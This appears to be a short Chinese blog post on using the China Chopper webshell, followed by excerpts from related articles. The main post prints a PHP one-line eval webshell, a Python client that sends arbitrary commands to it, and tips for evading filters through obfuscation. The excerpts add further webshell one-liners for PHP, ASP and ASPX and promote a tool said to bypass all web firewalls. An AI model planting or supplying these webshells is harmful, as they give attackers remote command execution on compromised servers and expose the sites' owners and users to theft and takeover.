关于中国菜刀,如何"切菜"

0x00  菜

关于一句话木马肯定是眼熟能详,一句话木马如下:

<?PHP eval($_POST[w]);?>

0x01  刀

一把西瓜刀如下:

# -*-coding=utf-8-*-
# /usr/bin/python

import sys
import requests

def encodePayload(payload):
    #请尽情蹂躏payload
    return str(payload)

cmd = sys.argv[1]
payload = encodePayload(cmd)
url = "www.xxx.com/1.php?w="+ payload
req = requests.get(url)
print req.text

本质上算是代码注入。

0x02 如果进行绕过呢?

需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。

博主正在想栗子...

时间: 2024-10-09 06:31:09

关于中国菜刀,如何"切菜"的相关文章

网络小黑揭秘系列之黑产江湖黑吃黑—中国菜刀的隐形把手

人在做,天在看. 黑产乃法外之地,被丛林法则所支配.没有了第三方强制力量的保障和监督,在那个圈子里我们可以看到两个极端:想做大生意的往往极重信誉,而那些只想捞一票就走的则会肆无忌惮地黑吃黑. 2015年12月中,360天眼实验室发布了“网络小黑揭秘系列之黑色SEO初探”,简单揭露了下网络上的黑色SEO活动,同时也提到了很多黑客工具中带有后门,其中就包括了某些使用面非常广的工具.没错,这回我们的主角是小黑们最喜闻乐见的中国菜刀. 0x01 中国菜刀 菜刀,厨房切菜之利器,亦可用于砍人.中国菜刀(C

【Web Shell】- 技术剖析中国菜刀 – Part I

这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处.中国菜刀用途十分广泛,支持多种语言,小巧实用,据说是一位中国军人退伍之后的作品.日前,国外安全公司Fireeye对这款工具进行了详细的剖析,可以说是一部非常nice的菜刀使用教程. 分析 中国菜刀的客户端可在www.maicaidao.com下载到. Web shell (CnC) Client MD5 caidao.exe 5001ef50c7e869253a7

小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)

webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 [但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/] 1.利用上传漏洞,先上传一句话木马[支持三种服务器端PHP.ASP.ASP.NET] 使用ssh连接metasploitable 创建包含木马代码的文件 2.连接相应的服务器端 添加服务器端URL [密码为一

最新中国菜刀caidao-20160620下载和说明

0x00 中国制造, 黑客之刀 中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相! 0x01 验证 此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了. 0x02 软件说明 菜刀 / Caidao @ http://www.maicaidao.com/ 1 菜刀,他是一款专业的网站管理工具 一.网站管理模块 (1)放在网站上的脚本程序分两种 1.1)“一句话(Eval)”: PHP, ASP, AS

(转载)中国菜刀的使用

想学学怎么用菜刀,刚在网上搜到了菜刀的使用方法.怕有和我一样的新手不会用,所以发过来,算是给大家分享吧.首先说一下菜刀的功能,菜刀是用来连一句话的,asp.aspx.php的一句话菜刀都可以连,只是这几种一句话语句不一样.  asp的一句话是:<%eval request("pass")%>  aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass&qu

&nbsp; 中国菜刀使用方法以及小技巧

相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库. 服务端: 在服务端运行的代码如下: PHP: ASP: <%eval request("pass")%&g

夜猫中国菜刀1.0版

夜猫中国菜刀 要就下载哦!!! 无后门,强大菜刀工具 下载地址:http://pan.baidu.com/s/1gfwi8vT

中国菜刀原理

用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵 这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验了,Asp和jsp的原理应该都差不多. 服务端的.php是这样: <?php eval($_POST['op']); ?> 客户端连接设置好URL,密码,连接好之后.我们开始实

新版中国菜刀20160620初体验

6月17号,某牛在朋友圈发了消息: 史上最牛逼的中国菜刀即将发布,过市面上所有的 waf,而且把 webshell 玩到让你瞠目结舌的境界. 当时有消息称 6 月底将会发布新版菜刀. 果不其然,在 6 月 20 日,原本已经关闭的 maicaidao.com 又开放了,而且下载量瞬间就到了 660 +. 话不多说,赶紧去下载一个体验一波到底有多牛逼. 文章发布时站点又关闭了,具体原因不得而知.(脉搏SP小编注:应该是被DDoS了) 脉搏小编看了一下whois变更,认为应该还是老兵作品.相关阅读<

[逆向破解]使用ESP定律手动脱&quot;中国菜刀&quot;壳

0x00前言: ESC定律脱壳一般的加壳软件在执行时,首先要初始化,保存环境(保存各个寄存器的值),一般利用PUSHAD(相当于把eax,ecx,edx,ebx,esp,ebp,esi,edi都压栈),当加壳程序的外壳执行完毕以后,再来恢复各个寄存器的内容,通常会用POPAD(相当与把eax,ecx,edx,ebx,esp,ebp,esi,edi都出栈),通过跨区段的转移来跳到程序的OEP来执行原程序!简单点来说就是会将加壳过程执行一遍之后会跳到OEP来执行源程序.当我们找到了OEP的时候就是找